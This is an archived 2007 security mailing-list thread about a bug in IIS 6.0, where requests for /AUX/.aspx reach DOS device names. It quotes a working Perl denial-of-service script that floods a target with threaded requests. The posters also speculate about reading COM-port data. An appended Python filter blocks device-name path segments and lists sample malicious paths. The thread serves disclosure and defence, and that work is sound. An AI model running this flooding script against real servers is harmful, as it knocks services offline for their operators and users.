Dear kingcope,

Funny enough, there is a chance this vulnerability can also be exploited
as a local unauthorized access or privilege escalation, to execute
user-supplied .aspx script from COM port (via serial cable) without having
console access with permissions of Web application. IWAM_%COMPUTERNAME% is
default, but it's often elevated for application pools for different
reasons. Need to be tested though.

Same vulnerability existed in IndigoPerl some time ago. See "One more
funny bug" in http://securityvulns.com/docs6145.html

--Wednesday, May 23, 2007, 12:54:35 PM, you wrote to 3APA3A@SECURITY.NNOV.RU:

k> Hello Russian friend,

k> This is an interesting thought. As you see in the exception
k> And in the exception backtrace of IIS it tries to access \\.\AUX
k> Or other special device names. Normally this is blocked by a
k> C# method which checks the path (for example /AUX.aspx is blocked).

k> Best Regards,

k> Kingcope

k> -----Original Message-----
k> From: 3APA3A [mailto:3APA3A@SECURITY.NNOV.RU]
k> Sent: Wednesday, May 23, 2007 10:41 AM
k> To: kingcope
k> Cc: Full-Disclosure; bugtraq@securityfocus.com
k> Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

k> Dear kingcope,

k> It's vulnerability regardless of DoS impact, because it allows attacker
k> to access special DOS devices (COM1 in this case). E.g. it could be used
k> to read data from device attached to COM1 or prevent another application
k> from accessing this port (or LPT), because access to ports is exclusive.

k> --Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
k> full-disclosure@lists.grok.org.uk:

k>> Hello List,

k>> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k>> When I request /AUX/.aspx the server takes a bit longer to respond as
k>> Normally. So I did write an automated script to see what happens if
k>> I request this file several times at once. The result is that some servers
k>> On the internet get quite instable, some do not. On some servers after I
k>> Stop the attack I get an exception that the Server is too busy/Unhandled
k>> Exception on the wwwroot (/) path.
k>> Can you/the list confirm that?

k>> Here is a lame testing script for this stuff:

k>> #When sending multiple parallel GET requests to a IIS 6.0 server requesting
k>> #/AUX/.aspx the server gets instable and non responsive. This happens only
k>> #to servers which respond a runtime error (System.Web.HttpException)
k>> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k>> #
k>> #
k>> #signed,
k>> #Kingcope kingcope@gmx.net
k>> ##########################################################################
k>> ###***********************************************************************
k>> ###
k>> ###
k>> ###
k>> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k>> ### by Kingcope, May/2007
k>> ### Better run this from a Linux system
k>> ##########################################################################

k>> use IO::Socket;
k>> use threads;

k>> if ($ARGV[0] eq "") { exit; }
k>> my $host = $ARGV[0];

k>> $|=1;

k>> sub sendit {
k>>     $sock = IO::Socket::INET->new(PeerAddr => $host,
k>>                                   PeerPort => 'http(80)',
k>>                                   Proto => 'tcp');
k>>     print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n";
k>> }

k>> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>>                               PeerPort => 'http(80)',
k>>                               Proto => 'tcp');
k>> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n";

k>> $k=0;
k>> while (<$sock>) {
k>>     if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k>>         $k=1;
k>>         last;
k>>     }
k>> }

k>> if ($k==0) {
k>>     print "Server does not seem vulnerable to this attack.\n";
k>>     exit;
k>> }

k>> print "ATTACK!\n";

k>> while(1){
k>>     for (my $i=0;$i<=100;$i++) {
k>>         $thr = threads->new(\&sendit);
k>>         print "\r\r\r$i/100 ";
k>>     }
k>>     foreach $thr (threads->list) {
k>>         $thr->join;
k>>     }
k>> }

k>> _______________________________________________
k>> Full-Disclosure - We believe in it.
k>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
k>> Hosted and sponsored by Secunia - http://secunia.com/

-- 
~/ZARAZA http://securityvulns.com/
Thus he dies for the sixth time - and again in a new place. (Twain)
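
The thread notes that /AUX.aspx is rejected by a path check while /AUX/.aspx still reaches \\.\AUX. The following is an added example, not code from either poster or from IIS: a front-end filter that tests every path segment for a DOS device name. The function names, the sample paths and the device list (CON, PRN, AUX, NUL, COM0-9, LPT0-9, per the Win32 file-naming rules) are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Reserved DOS device names (assumed list, per the Win32 file-naming rules).
_DEVICE = re.compile(r"^(?:CON|PRN|AUX|NUL|COM[0-9]|LPT[0-9])$", re.IGNORECASE)


def _stem(segment):
    """Reduce one segment to the part that is compared against device names."""
    # "AUX.aspx", "AUX:stream" and "AUX " all resolve to the AUX device,
    # so drop everything from the first dot or colon and any trailing spaces.
    return re.split(r"[.:]", segment, maxsplit=1)[0].rstrip(" ")


def device_segments(raw_path):
    """Return every segment of a request path that names a DOS device."""
    path = raw_path.split("?", 1)[0]          # the query string is not a file path
    for _ in range(3):                        # undo nested percent-encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Check each segment, not only the last one: in /AUX/.aspx the device
    # name is a directory component, not the file name.
    return [s for s in re.split(r"[/\\]+", path) if s and _DEVICE.match(_stem(s))]


def is_blocked(raw_path):
    return bool(device_segments(raw_path))


# Constructed sample request paths (not taken from any real log).
SAMPLE_PATHS = [
    "/AUX/.aspx",
    "/AUX.aspx",
    "/app/%41UX/.aspx",
    "/auxiliary/default.aspx",
    "/default.aspx?file=AUX",
]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(f"{'BLOCK' if is_blocked(p) else 'allow':5}  {p}")
```
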